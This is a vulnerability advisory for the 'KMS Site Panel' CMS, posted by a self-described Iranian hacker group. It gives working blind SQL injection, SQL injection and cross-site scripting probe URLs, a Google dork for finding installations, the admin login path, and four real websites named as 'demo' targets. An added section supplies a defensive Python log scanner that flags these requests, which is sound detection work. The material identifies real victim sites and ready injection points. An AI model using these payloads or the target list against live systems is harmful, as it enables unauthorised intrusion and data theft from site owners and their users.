"KMS Site Panel Multiple Vulnerabilities"
Author: alieye
E-mail: cseye_ut@yahoo.com
Vendor : http://www.mediasoft.ir/
Version: All versions
class : remote
Google dork (lang=Farsi) : "طراحي و اجراي سايت: شركت رایان رسانه كیش"
We Are: Alieye , Z0d14c , Bully13 , Alichi & All Iranian Hackers
greetz: C.S.Eye Security Team members
Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com
----------------------------------------------------------------
Blind SQL Injection
1-/index.php?PageID=43-2+2*3-6
2-/index.php?ATPID=5&PSID=4-2+2*3-6
----------------------------------------------------------------
Cross Site Scripting
3-/index.php?ATPID=5&PSID=<ScRiPt >prompt(989309)</ScRiPt>&VID=5
4-input SearchText set to <ScRiPt >prompt(989309)</ScRiPt>
----------------------------------------------------------------
SQL injection
5-/index.php?ATPID=4'
6-/index.php?ATPID=4&PSID=2'
7-/index.php?PageID=45'
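
Added example (not part of the original advisory): a defender-side check that scans web access logs for the request shapes in items 1-7, flagging any non-integer value in PageID, ATPID, PSID or VID and any markup in SearchText. It assumes those four parameters are integer IDs and that SearchText arrives in the query string; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the advisory; treating them as integer IDs is an assumption.
NUMERIC_PARAMS = {"PageID", "ATPID", "PSID", "VID"}
# SearchText is a form input in the advisory; assumed here to arrive in the query string.
TEXT_PARAMS = {"SearchText"}

INTEGER = re.compile(r"[0-9]{1,10}")
MARKUP = re.compile(r"[<>]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def check_request(target):
    """Return (param, reason) findings for one request target."""
    findings = []
    # parse_qsl percent-decodes values, so encoded input is checked in decoded form.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not INTEGER.fullmatch(value):
            findings.append((name, "non-integer value"))
        elif name in TEXT_PARAMS and MARKUP.search(value):
            findings.append((name, "markup in text field"))
    return findings

def scan_log(lines):
    """Return (line_number, param, reason) for every suspicious parameter."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line in the expected format
        for name, reason in check_request(match.group(1)):
            hits.append((number, name, reason))
    return hits

# Constructed sample log lines (documentation address range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2014:10:00:00 +0000] "GET /index.php?PageID=43 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2014:10:00:01 +0000] "GET /index.php?PageID=43-2+2*3-6 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2014:10:00:02 +0000] "GET /index.php?ATPID=5&PSID=%3CScRiPt%20%3Eprompt(989309)%3C/ScRiPt%3E&VID=5 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2014:10:00:03 +0000] "GET /index.php?ATPID=4&PSID=2%27 HTTP/1.1" 500 128',
    '203.0.113.7 - - [01/Jan/2014:10:00:04 +0000] "GET /index.php?SearchText=%3CScRiPt%20%3Eprompt(989309)%3C%2FScRiPt%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2014:10:00:05 +0000] "GET /index.php?ATPID=5&PSID=4&VID=5 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in the application before the value reaches a query or the page output, is what closes items 1-3 and 5-7; SearchText additionally needs output encoding.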
----------------------------------------------------------------
login page
http://site/CP/CP.php
----------------------------------------------------------------
demo website:
http://www.kish-hospital.com/
http://kishtourism.ir/
http://www.kishmalls.net/
http://www.shahrsazan.com/